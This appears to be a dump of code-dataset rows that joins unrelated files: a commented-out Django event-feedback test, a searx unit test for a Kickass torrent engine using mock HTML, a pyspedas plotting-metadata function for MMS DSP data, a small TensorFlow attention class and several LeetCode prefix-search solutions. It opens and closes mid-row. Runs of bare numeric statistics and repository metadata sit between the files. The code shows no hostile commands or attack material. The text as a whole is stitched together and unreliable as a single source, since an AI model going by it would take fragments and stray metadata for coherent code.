# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# self.eventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback="Testing Feedback")
# def test_delete_event_instance_feedback(self):
# response = self.client.delete(reverse('event-instance-feedback-view', kwargs={'pk':self.eventInstanceFeedback.id}))
# self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# class EventInstanceFeedbackFilterTest(APITestCase):
# def setUp(self):
# self.user, self.client = login()
# event = {
# "eventCode" : "T102",
# "name" : "Test",
# "description" : "Testing purposes",
# }
# testEvent = Event.objects.create(**event)
# eventInst ={
# "eventInstanceCode" : "Test102",
# "startDate" : timezone.now(),
# "endDate" : timezone.now() + datetime.timedelta(days=10),
# "location": "somewhere",
# "dates": [timezone.now() + datetime.timedelta(days=10+n) for n in range(5)],
# "isCompleted": False,
# "event": testEvent,
# "fee": 0
# }
# testEventInstance = EventInstance.objects.create(**eventInst)
# userEnrollment = {
# "user" : self.user,
# "paymentId" : "Testing ID",
# "eventInstance" : testEventInstance,
# "paymentPlatform" : "Testing Platform",
# "role" : 1,
# }
# testEnrollment = UserEnrollment.objects.create(**userEnrollment)
# testEventInstanceFeedback = EventInstanceFeedback.objects.create(userEnrollment=testEnrollment, eventInstance=testEventInstance, eventInstanceFeedback='Testing Feedback')
# def test_event_instance_feedback_filter_username(self):
# response = self.client.get(
# f"{reverse('event-instance-feedback-view')}?userEnrollment__user__username=yankai14&eventInstance__eventInstanceCode=&date_created="
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
# def test_event_instance_feedback_filter_event_instance_code(self):
# response = self.client.get(
# f"{reverse('event-instance-feedback-view')}?userEnrollment__user__username=&eventInstance__eventInstanceCode=Test102&date_created="
# )
# self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data["count"], 1)
| 35.627692
| 185
| 0.575697
| 922
| 11,579
| 7.132321
| 0.129067
| 0.045468
| 0.051095
| 0.051095
| 0.861618
| 0.859337
| 0.842914
| 0.826034
| 0.819343
| 0.787105
| 0
| 0.013729
| 0.295449
| 11,579
| 324
| 186
| 35.737654
| 0.792351
| 0.941446
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3a75c66974ebc8855998e95aa7e27ee575a6cab1
| 22,271
|
py
|
Python
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 4
|
2018-09-07T15:35:24.000Z
|
2019-03-27T09:48:12.000Z
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 371
|
2020-03-04T21:51:56.000Z
|
2022-03-31T20:59:11.000Z
|
Toolkits/Discovery/meta/searx/tests/unit/engines/test_kickass.py
|
roscopecoltran/SniperKit-Core
|
4600dffe1cddff438b948b6c22f586d052971e04
|
[
"MIT"
] | 3
|
2019-06-18T19:57:17.000Z
|
2020-11-06T03:55:08.000Z
|
# -*- coding: utf-8 -*-
from collections import defaultdict
import mock
from searx.engines import kickass
from searx.testing import SearxTestCase
class TestKickassEngine(SearxTestCase):
def test_request(self):
query = 'test_query'
dicto = defaultdict(dict)
dicto['pageno'] = 1
params = kickass.request(query, dicto)
self.assertIn('url', params)
self.assertIn(query, params['url'])
self.assertIn('kickass.cd', params['url'])
self.assertFalse(params['verify'])
def test_response(self):
self.assertRaises(AttributeError, kickass.response, None)
self.assertRaises(AttributeError, kickass.response, [])
self.assertRaises(AttributeError, kickass.response, '')
self.assertRaises(AttributeError, kickass.response, '[]')
response = mock.Mock(text='<html></html>')
self.assertEqual(kickass.response(response), [])
html = """
<table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
<tr class="firstr">
<th class="width100perc nopad">torrent name</th>
<th class="center">
<a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
</th>
<th class="center"><span class="files">
<a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
</th>
<th class="center"><span>
<a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
</th>
<th class="center"><span class="seed">
<a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
</th>
<th class="lasttd nobr center">
<a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
</th>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">449 bytes</td>
<td class="center">4</td>
<td class="center">2 years</td>
<td class="green center">10</td>
<td class="red lasttd center">1</td>
</tr>
</table>
"""
response = mock.Mock(text=html)
results = kickass.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['title'], 'This should be the title')
self.assertEqual(results[0]['url'], 'https://kickass.cd/url.html')
self.assertEqual(results[0]['content'], 'Posted by riri in Other > Unsorted')
self.assertEqual(results[0]['seed'], 10)
self.assertEqual(results[0]['leech'], 1)
self.assertEqual(results[0]['filesize'], 449)
self.assertEqual(results[0]['files'], 4)
self.assertEqual(results[0]['magnetlink'], 'magnet:?xt=urn:btih:MAGNETURL&dn=test')
self.assertEqual(results[0]['torrentfile'], 'http://torcache.net/torrent/53917.torrent?title=test')
html = """
<table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
<tr class="firstr">
<th class="width100perc nopad">torrent name</th>
<th class="center">
<a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
</th>
<th class="center"><span class="files">
<a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
</th>
<th class="center"><span>
<a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
</th>
<th class="center"><span class="seed">
<a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
</th>
<th class="lasttd nobr center">
<a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
</th>
</tr>
</table>
"""
response = mock.Mock(text=html)
results = kickass.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 0)
html = """
<table cellpadding="0" cellspacing="0" class="data" style="width: 100%">
<tr class="firstr">
<th class="width100perc nopad">torrent name</th>
<th class="center">
<a href="/search/test/?field=size&sorder=desc" rel="nofollow">size</a>
</th>
<th class="center"><span class="files">
<a href="/search/test/?field=files_count&sorder=desc" rel="nofollow">files</a></span>
</th>
<th class="center"><span>
<a href="/search/test/?field=time_add&sorder=desc" rel="nofollow">age</a></span>
</th>
<th class="center"><span class="seed">
<a href="/search/test/?field=seeders&sorder=desc" rel="nofollow">seed</a></span>
</th>
<th class="lasttd nobr center">
<a href="/search/test/?field=leechers&sorder=desc" rel="nofollow">leech</a>
</th>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">1 KiB</td>
<td class="center">4</td>
<td class="center">2 years</td>
<td class="green center">10</td>
<td class="red lasttd center">1</td>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">1 MiB</td>
<td class="center">4</td>
<td class="center">2 years</td>
<td class="green center">9</td>
<td class="red lasttd center">1</td>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">1 GiB</td>
<td class="center">4</td>
<td class="center">2 years</td>
<td class="green center">8</td>
<td class="red lasttd center">1</td>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">1 TiB</td>
<td class="center">4</td>
<td class="center">2 years</td>
<td class="green center">7</td>
<td class="red lasttd center">1</td>
</tr>
<tr class="even" id="torrent_test6478745">
<td>
<div class="iaconbox center floatright">
<a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
<em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
<i class="ka ka-comment"></i>
</a>
<a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
<i class="ka ka16 ka-verify ka-green"></i>
</a>
<a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
<i class="ka ka16 ka-arrow-down partner1Button"></i>
</a>
<a title="Torrent magnet link"
href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
<i class="ka ka16 ka-magnet"></i>
</a>
<a title="Download torrent file"
href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
<i class="ka ka16 ka-arrow-down"></i>
</a>
</div>
<div class="torrentname">
<a href="/test-t6478745.html" class="torType txtType"></a>
<a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
<div class="markeredBlock torType txtType">
<a href="/url.html" class="cellMainLink">
<strong class="red">This should be the title</strong>
</a>
<span class="font11px lightgrey block">
Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
<a class="plain" href="/user/riri/">riri</a> in
<span id="cat_6478745">
<strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
</span>
</span>
</div>
</td>
<td class="nobr center">z bytes</td>
<td class="center">r</td>
<td class="center">2 years</td>
<td class="green center">a</td>
<td class="red lasttd center">t</td>
</tr>
</table>
"""
response = mock.Mock(text=html)
results = kickass.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 5)
self.assertEqual(results[0]['title'], 'This should be the title')
self.assertEqual(results[0]['url'], 'https://kickass.cd/url.html')
self.assertEqual(results[0]['content'], 'Posted by riri in Other > Unsorted')
self.assertEqual(results[0]['seed'], 10)
self.assertEqual(results[0]['leech'], 1)
self.assertEqual(results[0]['files'], 4)
self.assertEqual(results[0]['magnetlink'], 'magnet:?xt=urn:btih:MAGNETURL&dn=test')
self.assertEqual(results[0]['torrentfile'], 'http://torcache.net/torrent/53917.torrent?title=test')
self.assertEqual(results[0]['filesize'], 1000)
self.assertEqual(results[1]['filesize'], 1000000)
self.assertEqual(results[2]['filesize'], 1000000000)
self.assertEqual(results[3]['filesize'], 1000000000000)
self.assertEqual(results[4]['seed'], 0)
self.assertEqual(results[4]['leech'], 0)
self.assertEqual(results[4]['files'], None)
self.assertEqual(results[4]['filesize'], None)
| 55.957286
| 115
| 0.464011
| 2,283
| 22,271
| 4.514674
| 0.07972
| 0.02474
| 0.027942
| 0.04657
| 0.937518
| 0.91986
| 0.917532
| 0.917532
| 0.917532
| 0.917532
| 0
| 0.049137
| 0.388667
| 22,271
| 397
| 116
| 56.098237
| 0.707896
| 0.000943
| 0
| 0.884021
| 0
| 0.131443
| 0.883675
| 0.174173
| 0
| 0
| 0
| 0
| 0.103093
| 1
| 0.005155
| false
| 0
| 0.010309
| 0
| 0.018041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c96df78d84209611b4434ff1f40f07ec27f767cf
| 7,443
|
py
|
Python
|
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | 1
|
2020-07-07T19:52:40.000Z
|
2020-07-07T19:52:40.000Z
|
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | null | null | null |
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | null | null | null |
from pytplot import options
from pyspedas import tnames
def mms_dsp_set_metadata(probe, data_rate, level, suffix=''):
"""
This function updates the metadata for DSP data products
Parameters:
probe : str or list of str
probe or list of probes, valid values for MMS probes are ['1','2','3','4'].
data_rate : str or list of str
instrument data rate for DSP
level : str
indicates level of data processing. the default if no level is specified is 'l2'
suffix: str
The tplot variable names will be given this suffix. By default,
no suffix is added.
"""
if not isinstance(probe, list): probe = [probe]
if not isinstance(data_rate, list): data_rate = [data_rate]
if not isinstance(level, list): level = [level]
instrument = 'dsp'
tvars = set(tnames())
for this_probe in probe:
for this_dr in data_rate:
for this_lvl in level:
if 'mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP BPSD SCM1 [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'ztitle', 'nT^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm1_'+this_dr+'_'+this_lvl+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP BPSD SCM2 [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'ztitle', 'nT^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm2_'+this_dr+'_'+this_lvl+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP BPSD SCM3 [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'ztitle', 'nT^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_scm3_'+this_dr+'_'+this_lvl+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP BPSD [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'ztitle', 'nT^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_bpsd_omni_'+this_dr+'_'+this_lvl+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP EPSD [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'ztitle', '(V/m)^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_omni'+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP EPSD-X [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'ztitle', '(V/m)^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_x'+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP EPSD-Y [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'ztitle', '(V/m)^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_y'+suffix, 'Colormap', 'jet')
if 'mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'ytitle', 'MMS'+str(this_probe)+' DSP EPSD-Z [Hz]')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'ztitle', '(V/m)^2/Hz')
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'spec', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'ylog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'zlog', True)
options('mms'+str(this_probe)+'_'+instrument+'_epsd_z'+suffix, 'Colormap', 'jet')
| 83.629213
| 162
| 0.60137
| 941
| 7,443
| 4.378321
| 0.083953
| 0.14199
| 0.15534
| 0.23301
| 0.853884
| 0.847087
| 0.847087
| 0.846602
| 0.817718
| 0.810194
| 0
| 0.006318
| 0.21322
| 7,443
| 89
| 163
| 83.629213
| 0.697234
| 0.064893
| 0
| 0
| 0
| 0
| 0.186232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.029851
| 0
| 0.044776
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e665f506257b8c0e4be30512fa1d8ef8c65ddd4
| 224
|
py
|
Python
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 5
|
2021-10-14T22:24:00.000Z
|
2022-03-24T20:11:59.000Z
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 1
|
2021-12-03T18:51:19.000Z
|
2021-12-03T18:51:19.000Z
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 2
|
2021-10-14T22:26:07.000Z
|
2022-03-24T20:23:05.000Z
|
from .. import base
from .Vector2VectorAttention import Vector2VectorAttention
class LabeledVectorAttention(base.LabeledVectorAttention, Vector2VectorAttention):
__doc__ = base.LabeledVectorAttention.__doc__
pass
| 24.888889
| 82
| 0.834821
| 17
| 224
| 10.529412
| 0.470588
| 0.290503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0.116071
| 224
| 8
| 83
| 28
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.2
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
6eba0d0514a6a4a51537bbf1979274d9d32b05ca
| 783
|
py
|
Python
|
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | 1
|
2021-11-28T15:03:32.000Z
|
2021-11-28T15:03:32.000Z
|
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
class Solution:
def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
lenght = len(searchWord)
for i, word in enumerate(sentence.split(" ")):
if searchWord == word[:lenght]:
return i+1
return -1
class Solution:
def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
for i, word in enumerate(sentence.split(" ")):
if word.startswith(searchWord):
return i+1
return -1
class Solution:
def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
lenght = len(searchWord)
words = sentence.split(" ")
for i, word in enumerate(words):
if searchWord == word[:lenght]:
return i+1
return -1
| 32.625
| 68
